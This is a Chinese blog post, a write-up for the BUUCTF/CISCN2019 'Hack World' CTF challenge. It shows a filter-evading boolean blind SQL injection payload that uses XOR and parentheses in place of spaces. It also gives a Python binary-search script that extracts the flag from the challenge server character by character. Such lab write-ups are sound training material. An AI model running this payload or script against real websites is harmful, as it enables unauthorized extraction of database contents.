[CISCN2019 华北赛区 Day2 Web1]Hack World

最新推荐文章于 2023-11-07 15:30:02 发布
最新推荐文章于 2023-11-07 15:30:02 发布
阅读量81 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43152809/article/details/108933610
版权

[CISCN2019 华北赛区 Day2 Web1]Hack World

输入1,2会正常的回显,输入空格会返回bool false,而输入其他攻击性的sql语句,会显示
在这里插入图片描述
但是输入1^1可以正常回显
在这里插入图片描述
所以结合sql盲注,输入

1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))

可以正常回显
ps:之前看到有个大佬的

之后菜鸡借鉴了一下大佬的二分代码

import requests                                                                                                                                                                                                                            
import time                                                                                                                                                                                                                                
                                                                                                                                                                                                                                           
url =" http://6848dcc9-35e3-4a89-a9a0-0b96eaa95bd3.node3.buuoj.cn"                                                                                                                                                                         
payload = {                                                                                                                                                                                                                                
        "id" : ""                                                                                                                                                                                                                          
}                                                                                                                                                                                                                                          
result = ""                                                                                                                                                                                                                                
for i in range(1,100):                                                                                                                                                                                                                     
        l = 33                                                                                                                                                                                                                             
        r =130                                                                                                                                                                                                                             
        mid = (l+r)>>1                                                                                                                                                                                                                     
        while(l<r):                                                                                                                                                                                                                        
                payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)                                                                                                                                 
                html = requests.post(url,data=payload)                                                                                                                                                                                     
                print(payload)                                                                                                                                                                                                             
                if "Hello" in html.text:                                                                                                                                                                                                   
                        l = mid+1                                                                                                                                                                                                          
                else:                                                                                                                                                                                                                      
                        r = mid                                                                                                                                                                                                            
                mid = (l+r)>>1                                                                                                                                                                                                             
        if(chr(mid)==" "):                                                                                                                                                                                                                 
                break                                                                                                                                                                                                                      
        result = result + chr(mid)                                                                                                                                                                                                         
        print(result)                                                                                                                                                                                                                      
print("flag: " ,result)

在这里插入图片描述
成功出现flag

参考链接:
https://blog.csdn.net/weixin_44077544/article/details/102669185

aur03a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
m_de_g的博客
04-22 522
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_74911687的博客
03-03 568
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
国赛 2019 华北赛区 Web 题目
最新发布
05-19
ciscn
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
2019华北电力大学全日制学士学位招生目录1
08-03
① 101 思想政治理论 ② 201 英语一 ③ 301 数学一 ④ 811 电力系统分析基础 ① 电力系统综合 ② 高电压技术 ③ 电力电子技术 ① 发电厂电
【BUUCTF】[CISCN2019 华北赛区 Day2 Web1]Hack World
aoao331198的博客
04-11 727
明确告诉了flag的位置 输入1 输入其他的基本上都没有错误回显或者信息,采用bool盲注 fuzz一波发现select没有过滤,空格过滤了 1^(ascii(substr((select(flag)from(flag)),1,1))>127) 正常回显,说明方法可行 脚本跑出每一个字符即可 import requests import time url='http://10cb7823-c884-4555-80b8-f586b15e6057.node4.buuoj.cn:81/index..
[CISCN2019 华北赛区 Day2 Web1]Hack World1
whale_waves的博客
11-07 207
Hello出现在页面时说明flag的ascii值大于最小值和最大值的中间值,所以缩小范围到中间值到最大值,一步一步缩小找到flag。# Hello出现在页面时说明flag的ascii值大于最小值和最大值的中间值,所以缩小范围到中间值到最大值,一步一步缩小找到flag。这里使用python编写脚本(应为已经告诉了flag在flag表flag字段里所以直接跳过查表查字段)1^1^1=1 1^0^1=0,就像是真真真等于真,真假真等于假(后续我们需要利用这一点)# 提前做好接受flag的变量。
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值